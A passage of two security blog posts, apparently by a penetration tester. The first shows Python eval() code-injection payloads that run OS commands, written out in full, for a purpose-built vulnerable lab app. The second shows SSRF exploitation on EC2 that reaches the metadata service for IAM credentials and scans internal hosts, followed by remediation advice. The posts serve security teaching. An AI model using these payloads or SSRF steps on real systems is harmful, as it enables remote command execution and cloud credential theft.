Setting up a Vulnerable Server</h2>
<div>
I created an intentionally vulnerable application for the purpose of this post, so if you want to exploit this in your lab, you can grab it <a href="https://github.com/sethsec/PyCodeInjection">here</a>. To get it to work, you have to install web.py via pip or easy_install, but that is it. It can run as a stand alone server, or it can be loaded up into Apache with mod_wsgi.<br />
<br />
<span style="color: #b45f06; font-family: "courier new" , "courier" , monospace;"><b>git clone https://github.com/sethsec/PyCodeInjection.git</b></span><br />
<span style="color: #b45f06; font-family: "courier new" , "courier" , monospace;"><b>cd VulnApp</b></span><br />
<span style="color: #b45f06; font-family: "courier new" , "courier" , monospace;"><b>./install_requirements.sh</b></span><br />
<span style="color: #b45f06; font-family: "courier new" , "courier" , monospace;"><b>python PyCodeInjectionApp.py</b></span><br />
<br /></div>
<h2>
The Vulnerability</h2>
<div>
Although you would be hard pressed to find an article online that talks about python eval() without warning that it is unsafe, eval() is the most likely culprit here. When you have the following two conditions, the vulnerability exists: </div>
<div>
<ol>
<li>Application accepts user input (e.g., GET/POST param, cookie value)</li>
<li>Application passes that user controlled input to eval in an unsafe way (without sanitization or other protection mechanisms). </li>
</ol>
</div>
<div>
Here is a simplified version of what the vulnerable code could look like:<br />
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/---jisjpw2xE/WCEFleqsRuI/AAAAAAAABLQ/t4TYMojXhNkg8vUSvsTva-gXNx-samnBgCLcB/s1600/pyinject-vulncode1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="168" src="https://4.bp.blogspot.com/---jisjpw2xE/WCEFleqsRuI/AAAAAAAABLQ/t4TYMojXhNkg8vUSvsTva-gXNx-samnBgCLcB/s640/pyinject-vulncode1.png" width="640" /></a></div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<br /></div>
<div>
That said, eval() is only one of the potential culprits here. A developer can also introduce this <a href="https://blog.nelhage.com/2011/03/exploiting-pickle/">vulnerability by unpickling</a> serialized data passed by the user.<br />
<br />
Python's exec() is another way you can make your app vulnerable, but as far as I can tell, a developer would have to try even harder to find a reason to exec() web based user input. That said, I'm sure it happens.<br />
<br /></div>
<h2>
Automated Discovery </h2>
<div>
Having a scanner find something I haven't seen before, and then doing the research to move from vanilla POC to something report worthy has been one of the pillars of my offensive security education (along with learning how to find things that scanners can not find). This vulnerability is no different. If you find this in the wild, you will most likely find it with an automated tool, like Burp Suite Pro. In fact, the check Burp uses is something they developed internally, so I'm not sure you would even find this vulnerability without Burp Suite Pro at this point. </div>
<div>
<br /></div>
<div>
Once you have the vulnerable demo app up and running, you should be able to find the vulnerability with a Burp Suite Pro scan: </div>
<div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-j6-c5W936fE/WBJWxCAYYQI/AAAAAAAABH8/tZQjIxvA-QI9QH3cGB3MitvOQtbGOri6gCEw/s1600/pyinject-burpfindings.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://1.bp.blogspot.com/-j6-c5W936fE/WBJWxCAYYQI/AAAAAAAABH8/tZQjIxvA-QI9QH3cGB3MitvOQtbGOri6gCEw/s400/pyinject-burpfindings.png" width="381" /></a></div>
<br />
<br />
Here are the details showing the payload that Burp used to find this vulnerability:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-oeFiNf-CiS4/WBJWxOBzcwI/AAAAAAAABIA/o1UpHK7zn9A76OTX70PqzQamDJCOutU3gCEw/s1600/pyinject-findingdetails.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="168" src="https://3.bp.blogspot.com/-oeFiNf-CiS4/WBJWxOBzcwI/AAAAAAAABIA/o1UpHK7zn9A76OTX70PqzQamDJCOutU3gCEw/s640/pyinject-findingdetails.png" width="640" /></a></div>
<br />
The reason Burp flags the app as vulnerable, is that after it sent this payload, which told the interpreter to sleep for 20 seconds, the response took 20 seconds to come back. As with any time based vulnerability check, every once in a while there are false positives, usually because the app in general starts responding slowly. <br />
<br />
<div>
<div>
<h2>
Moving from POC to Targeted Exploitation</h2>
<span style="font-family: inherit;">While time.sleep is a nice way to confirm the vulnerability, we want to execute OS commands AND receive the output. To do that, we were successful with </span>os.popen() or subprocess.Popen(), and subprocess.check_output(), and I'm sure there are others.<br />
<br />
The Burp Suite Pro payload uses a clever hack (using compile) that is required if you have multiple statements, as eval can only evaluate expressions. There is another way to accomplish this, using global functions (ex: __import__), which is explained <a href="http://www.floyd.ch/?p=584">here</a> and <a href="http://vipulchaskar.blogspot.com/2012/10/exploiting-eval-function-in-python.html">here</a>.<br />
<br />
This payload should work in most cases:
<!-- HTML generated using hilite.me -->
<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><b># Example with one expression</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b><span style="color: #b45f06;">__import__('os').popen('</span><span style="color: red;">COMMAND</span><span style="color: #b45f06;">').read()</span></b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;"><b># Example with multiple expressions, separated by commas</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b><span style="color: #b45f06;">str("-"*50),__import__('os').popen('</span><span style="color: red;">COMMAND</span><span style="color: #b45f06;">').read()</span></b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
If you need to execute a statement, or multiple statements, you will have to use eval/compile:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><b># Examples with one expression</b></span><br />
<br />
<ul>
<li><b style="font-family: "courier new", courier, monospace;"><span style="color: #b45f06;">eval(compile("""__import__('os').popen(r'</span><span style="color: red;">COMMAND</span><span style="color: #b45f06;">').read()""",'','single'))</span></b></li>
<li><b style="font-family: "courier new", courier, monospace;"><span style="color: #b45f06;">eval(compile("""__import__('subprocess').check_output(r'</span><span style="color: red;">COMMAND</span><span style="color: #b45f06;">',shell=True)""",'','single'))</span></b></li>
</ul>
<b>
<span style="font-family: "courier new" , "courier" , monospace;">#Examples with multiple statements, separated by semicolons</span></b><br />
<br />
<ul>
<li><b style="font-family: "courier new", courier, monospace;"><span style="color: #b45f06;">eval(compile("""__import__('os').popen(r'</span><span style="color: red;">COMMAND</span><span style="color: #b45f06;">').read();import time;time.sleep(2)""",'','single'))</span></b></li>
<li><b style="font-family: "courier new", courier, monospace;"><span style="color: #b45f06;">eval(compile("""__import__('subprocess').check_output(r'</span><span style="color: red;">COMMAND</span><span style="color: #b45f06;">',shell=True);import time;time.sleep(2)""",'','single'))</span></b></li>
</ul>
<br />
In my testing, some things just did not work with the global __import__ trick above, like using subprocess.Popen. In that case, just stick with the for loop technique that the Burp team came up with:<br />
<b></b><br />
<ul>
<li><b><b style="font-family: "courier new", courier, monospace;"><span style="color: #b45f06;">eval(compile("""for x in range(1):\n import os\n os.popen(r'</span><span style="color: red;">COMMAND</span><span style="color: #b45f06;">').read()""",'','single'))</span></b></b></li>
<li><b><b style="font-family: "courier new", courier, monospace;"><span style="color: #b45f06;">eval(compile("""for x in range(1):\n import subprocess\n subprocess.Popen(r'</span><span style="color: red;">COMMAND</span><span style="color: #b45f06;">',shell=True, stdout=subprocess.PIPE).stdout.read()""",'','single'))</span></b></b></li>
<li><b><b style="font-family: "courier new", courier, monospace;"><span style="color: #b45f06;">eval(compile("""for x in range(1):\n import subprocess\n subprocess.check_output(r'</span><span style="color: red;">COMMAND</span><span style="color: #b45f06;">',shell=True)""",'','single'))</span></b></b></li>
</ul>
<br />
If your vulnerable parameter is a GET parameter, you can exploit this easily with just your browser: </div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-JWF6W9Hkdsc/WBN7VtHoubI/AAAAAAAABJU/BKj7HF2tltAfhPyJ3B13vmrtaMIEeGWAgCEw/s1600/pyinject-browser.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="88" src="https://4.bp.blogspot.com/-JWF6W9Hkdsc/WBN7VtHoubI/AAAAAAAABJU/BKj7HF2tltAfhPyJ3B13vmrtaMIEeGWAgCEw/s640/pyinject-browser.png" width="640" /></a></div>
<br />
Note: The browsers do most of the required URL encoding for you, but you will have to manually encode semicolon (%3b) and spaces (%20) if they are used, or use the tool we developed which is covered below.<br />
<br />
If you are working with a POST parameter (or a cookie value which was the case on my pentest), you'll probably want to use Burp Repeater or something similar. This next series of screenshots shows me using subprocess.check_output() to call pwd, ls -al, whoami, and ping, all in one expression:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-wGjxPgP0SUc/WBt5ZUF9gCI/AAAAAAAABKE/wXobCpjPpaIoMbDrSf5MBuHynlsZPUp2QCLcB/s1600/pyinject-post-repeater.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="395" src="https://1.bp.blogspot.com/-wGjxPgP0SUc/WBt5ZUF9gCI/AAAAAAAABKE/wXobCpjPpaIoMbDrSf5MBuHynlsZPUp2QCLcB/s640/pyinject-post-repeater.png" width="640" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-gqnpwg0dKTk/WBt5ZS5hArI/AAAAAAAABKA/hkY0RnSySaUQ8jR22nH8Njwj6yoPw_cJACEw/s1600/pyinject-post-repeater-response.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="514" src="https://3.bp.blogspot.com/-gqnpwg0dKTk/WBt5ZS5hArI/AAAAAAAABKA/hkY0RnSySaUQ8jR22nH8Njwj6yoPw_cJACEw/s640/pyinject-post-repeater-response.png" width="640" /></a></div>
<br />
So manually URL encoding characters gets old fast, so you will probably find yourself wanting to whip up a python script to send the requests from the command line like Charlie and I did. Or, if you'd like, you can use ours.<br />
<br /></div>
<div>
<h2>
Exploitation Demonstration with PyCodeInjectionShell</h2>
</div>
<div>
You can download PyCodeInjectionShell, and read up on how to use it here: <a href="https://github.com/sethsec/PyCodeInjection">https://github.com/sethsec/PyCodeInjection</a>. PyCodeInjectionShell it is written to feel like sqlmap as much as possible. Our assumption is that anyone who needs to use this tool is probably very familiar with sqlmap. <br />
<br />
Here is what it looks like in action, accepting a URL. Note the sqlmap style <b>*</b> designating the payload placement in the URL. This example also uses interactive mode, which lets you continuously enter new commands until you exit:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-F-l5jXdBdf8/WBt9GwQA-5I/AAAAAAAABKY/PIl1E-XSvSY_xkmJ_Ru2OOuVc0XiL_KBACLcB/s1600/PyCodeInjectionShell-url-interactive.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://2.bp.blogspot.com/-F-l5jXdBdf8/WBt9GwQA-5I/AAAAAAAABKY/PIl1E-XSvSY_xkmJ_Ru2OOuVc0XiL_KBACLcB/s640/PyCodeInjectionShell-url-interactive.png" width="578" /></a></div>
<br />
And here is the same functionality using a request file copy/pasted from burp repeater, with an implanted *, which tells the tool where to inject:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-ZAvl7DJBC_U/WCDFCplFG-I/AAAAAAAABK4/Qy5xX3Ozk5MXxqCA6pGcekpDfGQ3cNqIgCLcB/s1600/PyCodeInjectionShell-request-interactive1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="464" src="https://4.bp.blogspot.com/-ZAvl7DJBC_U/WCDFCplFG-I/AAAAAAAABK4/Qy5xX3Ozk5MXxqCA6pGcekpDfGQ3cNqIgCLcB/s640/PyCodeInjectionShell-request-interactive1.png" width="640" /></a></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
In either example, if you just want to enter one command and exit, just remove the -i. <br />
<br /></div>
<div>
Feedback, suggestions, questions and bug reports are welcome!</div>
<style>
<!--
/* Font Definitions */
@font-face
{font-family:"Cambria Math";
panose-1:2 4 5 3 5 4 6 3 2 4;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;}
@font-face
{font-family:"Segoe UI";
panose-1:2 11 5 2 4 2 4 2 2 3;}
@font-face
{font-family:Consolas;
panose-1:2 11 6 9 2 2 4 3 2 4;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{margin-top:0in;
margin-right:0in;
margin-bottom:8.0pt;
margin-left:0in;
line-height:107%;
font-size:11.0pt;
font-family:"Calibri",sans-serif;}
.MsoChpDefault
{font-family:"Calibri",sans-serif;}
.MsoPapDefault
{margin-bottom:8.0pt;
line-height:107%;}
/* Page Definitions */
@page WordSection1
{size:8.5in 11.0in;
margin:1.0in 1.0in 1.0in 1.0in;}
div.WordSection1
{page:WordSection1;}
-->
</style>
Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com10tag:blogger.com,1999:blog-5890567984672491244.post-46032671853355661922015-12-23T11:16:00.000-05:002015-12-28T11:11:56.484-05:00Exploiting Server Side Request Forgery on a Node/Express Application (hosted on Amazon EC2)I recently came across a Server Side Request Forgery (SSRF) vulnerability within an application that I assessed. The application was hosted on Amazon EC2 and was using Node.js, Express.js, and as I found out later, Needle.js.<br />
<br />
<h2>
Discovery</h2>
<h3>
</h3>
<h3>
</h3>
<h3>
</h3>
<h3>
Manual Discovery</h3>
In the discovery phase, I noticed a function of the application that was taking a user specified URL and displaying the first paragraph from that URL into the page. This application allowed a user to share a URL with their friends, and grabbing the first paragraph was a feature that would provide the friends with more context.<br />
<br />
The thing is, when looking at my Burp history, I could not find the request to the URL that I specified in my logs. This should raise an eyebrow! <b>This means that the server is taking the URL I specified, making a request on my behalf, and then returning the result to me. That right there is SSRF</b>. Then, the only question was: What is the risk?<br />
<br />
<h3>
Automated Discovery</h3>
Since April 2015, if you are using the <a href="http://blog.portswigger.net/2015/04/introducing-burp-collaborator.html">Burp Collaborator</a> (and you definitely should be), you should be able to detect SSRF if you send the vulnerable request to the active scanner. The following image shows a few different ways Burp Collaborator can identify SSRF (as Out-of-band resource load and External service interaction).<br />
<br />
<a href="http://4.bp.blogspot.com/-PiTGn02cgZw/VnrDCk5FnaI/AAAAAAAABCU/QAV6Z0uAvqo/s1600/burp-collaborator1.png" imageanchor="1"><img border="0" height="166" src="http://4.bp.blogspot.com/-PiTGn02cgZw/VnrDCk5FnaI/AAAAAAAABCU/QAV6Z0uAvqo/s400/burp-collaborator1.png" width="400" /></a><br />
<h2>
</h2>
<h2>
</h2>
<h2>
</h2>
<h2>
Exploitation Demonstration</h2>
I wanted to demonstrate this SSRF vulnerability without sharing any details about the assessed application. To do this, I re-created the vulnerability by somehow hacking together my first Node.js application (and it actually worked).<br />
<br />
Source: <a href="https://github.com/sethsec/Nodejs-SSRF-App">https://github.com/sethsec/Nodejs-SSRF-App</a><br />
<br />
My application, which for this demo is hosted on an Amazon EC2 micro instance, runs Node.js, and uses Express.js and Needle.js (which is what makes the SSRF request). <br />
<br />
Just as the real application did, my demo application takes a URL specified by the user, and makes a request using Needle.js. The real application accepted the user supplied URL from a JSON parameter in the BODY, however my Node skills are not there yet, so for my demo the URL is sent via a GET parameter.<br />
<br />
This is the most pertinent part of the vulnerable app:<br />
<br />
<a href="http://2.bp.blogspot.com/-6AUR9KcOWBs/VncJbe2j08I/AAAAAAAABBI/RkL_mGg5RKE/s1600/vulnapp1.png" imageanchor="1"><img border="0" height="170" src="http://2.bp.blogspot.com/-6AUR9KcOWBs/VncJbe2j08I/AAAAAAAABBI/RkL_mGg5RKE/s640/vulnapp1.png" width="640" /></a><br />
<br />
This is what it looks like in action:<br />
<br />
<a href="http://2.bp.blogspot.com/-pnQhAh60yaw/Vmc8PzsZaQI/AAAAAAAAA8Y/eepoBjQfBks/s1600/ssrf%2B-%2Bsethsec.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="377" src="http://2.bp.blogspot.com/-pnQhAh60yaw/Vmc8PzsZaQI/AAAAAAAAA8Y/eepoBjQfBks/s640/ssrf%2B-%2Bsethsec.png" width="640" /></a><br />
<br />
<br />
<br />
It looks just like an iframe, doesn't it? But if it were a typical iframe, your browser would be making the request to sethsec.blogspot.com, and the application would not be vulnerable to SSRF.<br />
<br />
However, when I ask the vulnerable server to make a request to ifconfig.pro, a site that shows the IP Address and User Agent of the requester, I can confirm the SSRF pretty clearly:<br />
<br />
<div style="text-align: center;">
<div style="text-align: left;">
<a href="http://3.bp.blogspot.com/-1kbAnM6UQbI/VmnFOzzIGRI/AAAAAAAAA80/2ighuUBUUTU/s1600/ssrf%2B-%2Bsource%2BIP%2Band%2Buser%2Bagent.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="281" src="http://3.bp.blogspot.com/-1kbAnM6UQbI/VmnFOzzIGRI/AAAAAAAAA80/2ighuUBUUTU/s640/ssrf%2B-%2Bsource%2BIP%2Band%2Buser%2Bagent.png" width="640" /></a></div>
</div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
The two most interesting items are the source IP and the User_Agent. This response from ifconfig.pro proves that the request was sent by the EC2 instance, specifically from Needle, a Node.js HTTP client.<br />
<br />
<h3>
Who cares? What is the risk? </h3>
Well, as mentioned above and discovered by many excellent researchers, if you can get the server to make a request for you, you can often gain access to things you otherwise would not have the ability to access.<br />
<br />
<h3>
Accessing the Amazon EC2 Metadata Service</h3>
For example, if your application is running on an Amazon EC2 instance, you can query the instance metadata service at 169.254.169.254 (a non-routable address). This service is ONLY accessible via the instance itself, so without SSRF, command injection, or something similar, you would never be able to reach this service.<br />
<br />
<div style="text-align: left;">
<a href="http://1.bp.blogspot.com/-aBcrCk2kEMg/VnOOdw_wA2I/AAAAAAAAA_Q/P7_0Hww-nQc/s1600/ssrf3.png" imageanchor="1"><img border="0" height="296" src="http://1.bp.blogspot.com/-aBcrCk2kEMg/VnOOdw_wA2I/AAAAAAAAA_Q/P7_0Hww-nQc/s640/ssrf3.png" width="640" /></a></div>
<div style="text-align: right;">
<br /></div>
<br />
This is just one example of a metadata object. Erik Peterson (<a href="https://twitter.com/silvexis">@silvexis</a>) covers much more sensitive things that can potentially live in the metadata service in his excellent talk <a href="https://www.youtube.com/watch?v=JTOWxi17k-w">Bringing a Machete to the Amazon</a>. For example, this next request allows an attacker to retrieve the temporary security credentials for the "admins" role, which would allow an attacker to control access to your AWS resources. <br />
<br />
<br />
<div style="text-align: center;">
<div style="text-align: left;">
<a href="http://4.bp.blogspot.com/-wDyr_VXFzHc/VmnJc1xVziI/AAAAAAAAA9M/qxkKRXWzr5U/s1600/ssrf%2B-%2Bsecurity%2Bcredentials2.png" imageanchor="1"><img border="0" height="371" src="http://4.bp.blogspot.com/-wDyr_VXFzHc/VmnJc1xVziI/AAAAAAAAA9M/qxkKRXWzr5U/s640/ssrf%2B-%2Bsecurity%2Bcredentials2.png" width="640" /></a></div>
</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: left;">
<h3>
Accessing the Amazon EC2 User Data Object</h3>
Another place you will want to look is the user-data container, located at: http://169.254.169.254/latest/user-data. Amazon gives the following warning to devs:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://4.bp.blogspot.com/-76_sFKHPGTI/Vm4v-ajmUqI/AAAAAAAAA-A/Mrq3v7TcKAY/s1600/2015-12-13%2B21_56_15-Instance%2BMetadata%2Band%2BUser%2BData%2B-%2BAmazon%2BElastic%2BCompute%2BCloud.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="114" src="http://4.bp.blogspot.com/-76_sFKHPGTI/Vm4v-ajmUqI/AAAAAAAAA-A/Mrq3v7TcKAY/s640/2015-12-13%2B21_56_15-Instance%2BMetadata%2Band%2BUser%2BData%2B-%2BAmazon%2BElastic%2BCompute%2BCloud.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-add-user-data</td></tr>
</tbody></table>
<br />
But as we all know, if it is easier to store some passwords or other sensitive data in user-data, some people will, which is why you should check. This is what that request looks like from my vulnerable EC2 instance:<br />
<br />
<div style="text-align: center;">
<div style="text-align: left;">
<a href="http://1.bp.blogspot.com/-9Rm0IkO5wfQ/Vm4xGHYQTxI/AAAAAAAAA-Y/Fsc3kDV6Gls/s1600/ssrf%2B-%2Buserdata.png" imageanchor="1"><img border="0" height="312" src="http://1.bp.blogspot.com/-9Rm0IkO5wfQ/Vm4xGHYQTxI/AAAAAAAAA-Y/Fsc3kDV6Gls/s640/ssrf%2B-%2Buserdata.png" width="640" /></a></div>
</div>
<br />
For a complete list of what to look for if you have access to the EC2 metadata service, check out this document from Amazon: <a href="http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html" target="_blank">Instance Metadata and User Data</a>.<br />
<br /></div>
<div style="text-align: left;">
<h3>
Scanning and Accessing the Back End Infrastructure</h3>
In addition to checking the metadata service (and also looking for user data), you should try to exploit SSRF to look for services, hosts, and resources that are accessible via the vulnerable server, but not accessible to you directly. Burp Intruder is a great tool to accomplish each of these tasks.<br />
<h4>
</h4>
<h4>
</h4>
<h4>
</h4>
<h4>
</h4>
<h4>
</h4>
<h4>
Demo Setup</h4>
To set up for the demo, I am using a second EC2 instance running Kali, with an internal IP address of 172.31.40.122 and listening on port 8080. The web service on this host is not accessible from the Internet. In fact, the only connections allowed to 172.31.40.122 are from the internal IP address of the server that is vulnerable to SSRF, and only on port 8080/tcp.<br />
<br />
Here is is the EC2 security policy for 172.31.40.122 (Kali running apache):<br />
<br />
<a href="http://2.bp.blogspot.com/-Cl9HNxU58eI/Vm417ImFhII/AAAAAAAAA-o/-BprlhY3K8E/s1600/2015-12-13%2B20_51_35-EC2%2BManagement%2BConsole.png" imageanchor="1" style="text-align: center;"><img border="0" height="216" src="http://2.bp.blogspot.com/-Cl9HNxU58eI/Vm417ImFhII/AAAAAAAAA-o/-BprlhY3K8E/s640/2015-12-13%2B20_51_35-EC2%2BManagement%2BConsole.png" width="640" /></a><br />
<h4>
<br />Scanning for ports (XSPA)</h4>
<br />
1) Make the initial request through Burp. In this example, I just attempted to access TCP port 1.<br />
<br />
<a href="http://4.bp.blogspot.com/-4g4wBtKY0Ro/VnOXPagFk4I/AAAAAAAAA_g/8eiNWWSiUzM/s1600/xspa1.png" imageanchor="1"><img border="0" height="100" src="http://4.bp.blogspot.com/-4g4wBtKY0Ro/VnOXPagFk4I/AAAAAAAAA_g/8eiNWWSiUzM/s400/xspa1.png" width="400" /></a><br />
<br />
2) Send the initial request to Burp Intruder.<br />
<br />
<a href="http://2.bp.blogspot.com/-GvjEeN6LYR0/VnOXjJ3Ur-I/AAAAAAAAA_s/FU9rtEwA0-4/s1600/xspa2.png" imageanchor="1"><img border="0" height="130" src="http://2.bp.blogspot.com/-GvjEeN6LYR0/VnOXjJ3Ur-I/AAAAAAAAA_s/FU9rtEwA0-4/s400/xspa2.png" width="400" /></a><br />
<br />
3) Set the payload position (to the port).<br />
<br />
<a href="http://2.bp.blogspot.com/-lubZgpfg0uA/VnOX_Wu7SJI/AAAAAAAAA_4/x-R6MV71Gnw/s1600/xspa3.png" imageanchor="1"><img border="0" height="266" src="http://2.bp.blogspot.com/-lubZgpfg0uA/VnOX_Wu7SJI/AAAAAAAAA_4/x-R6MV71Gnw/s400/xspa3.png" width="400" /></a><br />
<br />
4) Set the payload itself. For the demo, I am selecting 11 sequential ports, but you could easily paste in the top X tcp ports from nmap or a list of common web server ports.<br />
<br />
<a href="http://3.bp.blogspot.com/-QjNdLo-cXxY/VnOYsziePUI/AAAAAAAABAE/fBFYpGSt7v8/s1600/xspa4.png" imageanchor="1"><img border="0" height="400" src="http://3.bp.blogspot.com/-QjNdLo-cXxY/VnOYsziePUI/AAAAAAAABAE/fBFYpGSt7v8/s400/xspa4.png" width="381" /></a><br />
<br />
5) Start the attack. As you can see from the screenshot below, there are a few potential ways to infer which port is open and which ports are closed. In this case, you can use the response code OR the length of the response:<br />
<br />
<a href="http://3.bp.blogspot.com/-sgNVV6XHOKA/VnOZmw3udFI/AAAAAAAABAc/eCQsAauQ9Ds/s1600/xspa5.png" imageanchor="1"><img border="0" height="355" src="http://3.bp.blogspot.com/-sgNVV6XHOKA/VnOZmw3udFI/AAAAAAAABAc/eCQsAauQ9Ds/s400/xspa5.png" width="400" /></a><br />
<br />
Alright! I just determined that 172.31.40.122 is listening on port 8080, and that it is running a web server.<br />
<h4>
</h4>
<h4>
</h4>
<h4>
</h4>
<h4>
</h4>
<h4>
</h4>
<h4>
Scanning for hosts</h4>
This follows the exact same steps as above, but instead of setting the port as the payload position, you would set the IP address range you want to scan, so that you are scanning a range of IP addresses for a particular port, like port 80/tcp or 443/tcp. <br />
<br />
It would look like this:<br />
<br />
<a href="http://1.bp.blogspot.com/--_zWmBpWTIY/VnOamLmfIhI/AAAAAAAABAo/ra4zBZgM99w/s1600/ssrf6.png" imageanchor="1"><img border="0" height="177" src="http://1.bp.blogspot.com/--_zWmBpWTIY/VnOamLmfIhI/AAAAAAAABAo/ra4zBZgM99w/s400/ssrf6.png" width="400" /></a><br />
<br />
I did not want to actually scan other EC2 IPs, so I'm just leaving this example here. But, basically, you pick back up again at step 4 and everything else is the same as above. <br />
<br />
You could also use the Cluster Bomb attack type in Burp and scan for ports and services at the same time.<br />
<h4>
<a href="http://1.bp.blogspot.com/-R_yGB-Uuj0c/VncoCW-mHrI/AAAAAAAABBk/FqJTFCNovxU/s1600/clusterbomb1.png" imageanchor="1"><img border="0" height="55" src="http://1.bp.blogspot.com/-R_yGB-Uuj0c/VncoCW-mHrI/AAAAAAAABBk/FqJTFCNovxU/s400/clusterbomb1.png" width="400" /></a></h4>
<h4>
</h4>
<h4>
</h4>
<h4>
</h4>
<h4>
</h4>
<h4>
Scanning the internal web server</h4>
Next, I'll show how we can once again repeat the process described above, but this time we'll scan for files and/or directories on a server, rather than scanning ports or hosts. <br />
<br />
As this is my demo, I know the target file is located at users.txt, but I threw a few other pages into Burp Intruder to show what this would look like. In a real world scenario, you would want to use a source of directories and file names from a resource like <a href="https://github.com/rustyrobot/fuzzdb" target="_blank">fuzzdb</a>.<br />
<div style="text-align: center;">
<br /></div>
Just like in the previous examples, you can find a match by looking for a difference. In this example, everything gives you a 200 status, but the length of users.txt is shorter than all of the others. This is your first clue that you found a file that exists. <br />
<br />
<a href="http://3.bp.blogspot.com/-vhIsDSVBFWo/VnOj6tNzEHI/AAAAAAAABA4/_y9bkteTSqs/s1600/ssrf-backend.png" imageanchor="1"><img border="0" height="640" src="http://3.bp.blogspot.com/-vhIsDSVBFWo/VnOj6tNzEHI/AAAAAAAABA4/_y9bkteTSqs/s640/ssrf-backend.png" width="545" /></a><br />
<br />
As with the ports and services example from above, you could also use the Cluster Bomb attack type in Burp to scan multiple web servers you have identified with the same file/directory list, all at the same time.<br />
<br />
<h2>
</h2>
<h2>
Remediation</h2>
Rather than proxying requests on behalf of users, the application should have the user’s browser retrieve the desired information. If it is necessary to proxy the request, a white list should be used on the server side and the User-Agent information should be stripped or modified.<br />
<h2>
<br />Additional Resources </h2>
</div>
<div style="text-align: left;">
There are several great SSRF resources out there. In my opinion, Nicolas Grégoire (<a href="https://twitter.com/Agarri_FR">@Agarri_FR</a>) is the master of SSRF (and XXE), so if you have not read up on much about either, you need to check out some of his blog posts and talks.<br />
<br />
One of my favorite talks: <a href="https://www.youtube.com/watch?v=mQjTgDuLsp4">Nicolas Grégoire - Hunting for Top Bounties</a><br />
One of my favorite blog posts: <a href="http://www.agarri.fr/kom/archives/2013/11/27/compromising_an_unreachable_solr_server_with_cve-2013-6397/index.html">Compromising an unreachable Solr server with CVE-2013-6397</a><br />
<br />
I decided to blog about this because I just submitted a <a href="https://github.com/sethsec/cfdb/blob/master/Web/Server-Side%20Request%20Forgery.md" target="_blank">SSRF finding</a> as a pull request to Mubix's <a href="https://github.com/mubix/cfdb/" target="_blank">Common Findings Database Project</a> (CFDB). That finding has some of the same content I included here. In the CFDB finding, I include a bunch of links to prior work as well as some useful resources. </div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
I think CFDB is a great project, and sorely needed at this point in our industry. I urge anyone who can contribute to do so. </div>
<div style="text-align: left;">
<br /></div>
<h2>
Final Thoughts</h2>
<div>
Unlike client side vulnerabilities like XSS and CSRF, SSRF can potentially give you access to back end infrastructure that you would not otherwise have access to. Keep an eye out for it, and if you do find it, remember to demonstrate the risk. <br />
<br />
Did I miss the mark on anything? Was I inaccurate? Was this post helpful to you? Feedback is welcome and encouraged!</div>
<div style="text-align: left;">
<br />
<br /></div>
Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com3tag:blogger.com,1999:blog-5890567984672491244.post-334540983797081212014-12-23T11:24:00.000-05:002014-12-29T22:45:08.202-05:00Forging my way into an XFinity home network via the Arris TG862G<br />
